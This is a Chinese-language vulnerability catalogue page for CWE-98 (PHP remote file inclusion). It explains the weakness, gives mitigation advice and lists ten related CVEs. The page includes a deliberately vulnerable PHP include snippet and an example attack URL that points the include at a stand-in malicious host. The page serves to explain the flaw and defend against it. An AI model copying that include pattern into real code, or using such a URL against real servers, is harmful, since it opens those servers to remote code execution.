CWE-98 PHP程序中Include/Require语句包含文件控制不恰当(PHP远程文件包含) 类弱点 1210 条 CVE 漏洞汇总,含 AI 中文分析。
CWE-98是PHP远程文件包含漏洞,源于程序未严格限制包含语句中的文件名输入。攻击者常通过构造恶意URL,诱导服务器加载并执行远程恶意代码,从而获取系统控制权。开发者应避免直接使用用户输入作为包含路径,需实施严格的白名单校验,禁用远程文件包含功能,并确保输入经过充分净化,以阻断此类攻击路径。
$dir = $_GET['module_name']; include($dir . "/function.php");victim.php?module_name=http://malicious.example.com| CVE ID | 标题 | CVSS | 风险等级 | Published |
|---|---|---|---|---|
| CVE-2021-29113 | ArcGIS Server 代码注入漏洞 — ArcGIS Server | 4.7 | - | 2021-12-07 |
| CVE-2021-22968 | PortlandLabs Concrete CMS 代码问题漏洞 — https://github.com/concrete5/concrete5 | 7.2 | - | 2021-11-19 |
| CVE-2021-21804 | Advantech R-SeeNet 安全漏洞 — Advantech | 9.8 | - | 2021-07-16 |
| CVE-2020-13175 | Teradici Cloud Access Connector和Cloud Access Connector Legacy 安全漏洞 — - Cloud Access Connector - Cloud Access Connector Legacy | 7.5 | - | 2020-08-11 |
| CVE-2020-5295 | October CMS 安全漏洞 — october | 4.8 | Medium | 2020-06-03 |
| CVE-2019-5479 | larvitbase-api 注入漏洞 — larvitbase-api | 7.5 | - | 2019-09-03 |
| CVE-2014-9186 | Honeywell International Experion PKS 输入验证错误漏洞 — Experion PKS | 9.8 | - | 2019-04-08 |
| CVE-2015-6461 | Schneider Electric Modicon M340 PLC Station P34模块安全漏洞 — Schneider Electric Modicon PLC | 6.4 | - | 2019-03-21 |
| CVE-2016-6565 | WordPress Imagely NextGen Gallery插件输入验证漏洞 — NextGen Gallery plugin | 8.8 | - | 2018-07-13 |
| CVE-2017-14095 | Trend Micro Smart Protection Server(Standalone) 安全漏洞 — Trend Micro Smart Protection Server (Standalone) | 7.4 | - | 2018-01-19 |
CWE-98(PHP程序中Include/Require语句包含文件控制不恰当(PHP远程文件包含)) 是常见的弱点类别,本平台收录该类弱点关联的 1210 条 CVE 漏洞。